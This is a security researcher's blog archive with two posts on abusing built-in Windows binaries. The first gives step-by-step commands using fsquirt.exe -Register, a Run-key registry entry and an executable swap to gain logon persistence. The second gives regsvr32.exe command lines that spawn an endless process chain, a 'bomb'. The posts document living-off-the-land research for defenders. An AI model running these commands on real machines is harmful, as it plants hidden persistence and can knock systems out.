Category Archives: little known secrets

1 little known secret of fsquirt.exe

Posted on by

The program in the title of this post is not very well-known. It’s being used for some random Bluetooth stuff that not too many PC users care about (okay, it’s a bit of a stretch, but I guess it’s really not very well-known).

How do you make a use of a binary no one cares about?

When I first looked at fsquirt.exe‘s command line arguments, I immediately thought of using it in my Beyond Good Ol’ Run key series as it was really a perfect candidate – until I discovered that despite behaving in a predictable way, delivering what I needed it to, I could not write the new post in that series, because the intended trick simply didn’t work.

I know it sounds dramatic, but this is a nature of the research.

I still wanted to make a triumph of the discovery though, so here we are…

When you run fsquirt.exe with the -Register argument it will create a LNK file c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK that will lead Explorer to add the following item under your Send To Explorer submenu:

Running it with -UnRegister argument will remove this entry.

But here’s the secret…

Run:

c:\windows\System32\fsquirt.exe -Register

To ensure that this LNK file is created:

c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK

Add a legitimate Run entry pointing to the LNK created in last step:

reg add "hkcu\software\microsoft\windows\currentversion\run" /v foo /d "c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK"

Copy c:\windows\System32\fsquirt.exe to a different folder f.ex. c:\test by running a command like this:

copy c:\windows\System32\fsquirt.exe c:\test

Re-register it to a different location:

c:\test\fsquirt.exe  -Register

This will overwrite the LNK file above to point to c:\test\fsquirt.exe.

Overwrite c:\test\fsquirt.exe with any executable of your choice – now you have an executable that will run anytime user logs on.

It’s a classic bait and switch.

1 little known secret of regsvr32.exe, take three

Posted on by

In the past I wrote a few times about the side-effect of having 2 binaries named the same way and residing in respective System32 and SysWOW64 directories.

Regsvr32.exe is not different. If you run a 32-bit Regsvr32.exe with a command line argument being a path to a 64-bit DLL or OCX, it will spawn its 64-bit twin Regsvr32.exe to handle the request:

I am happy to report that regsvr32.exe is using GetSystemDirectoryW and GetSystemWow64Directory2W APIs instead of relying on environmental variables to build the paths for respective binaries, so there is definitely less chances for lolbinish abuse.

Now, this is not the little known secret yet.

The secret is this:

When you force the regsvr32.exe for one architecture to spawn the other regsvr32.exe with the other architecture, the command line argument that you started with will be passed to children regsvr32.exe process, in full.

Do you see where it is going?

Based on the idea from the post number one in this series, we now know we can pass a list of library names (limit is 256) to regsvr32.exe and it will load them all one by one. What if we passed a command line argument that interleaves 32-bit and 64-bit libraries?

The result will be a never-ending, chain reaction-like tree of interleaving regsvr32.exe processes executed one bye one!

Do you want to test it at home?

Warning: do not try this at home!

regsvr32.exe c:\WINDOWS\system32\hhctrl.ocx c:\WINDOWS\syswow64\hhctrl.ocx c:\WINDOWS\sysnative\hhctrl.ocx

As far as I can tell this is the first documented case where c:\WINDOWS\system32\, c:\WINDOWS\syswow64\, and c:\WINDOWS\sysnative\ have ever been used together in a command line of any program.

And yes, you can add /s parameter to it too, that is – if you don’t want any control over it (/s stands for silent and is disabling any GUI feedback from regsvr32.exe)! 

regsvr32.exe /s c:\WINDOWS\system32\hhctrl.ocx c:\WINDOWS\syswow64\hhctrl.ocx c:\WINDOWS\sysnative\hhctrl.ocx

Be warned tough! This is a regsvr32.exe bomb! And it’s a possible DOLBIN!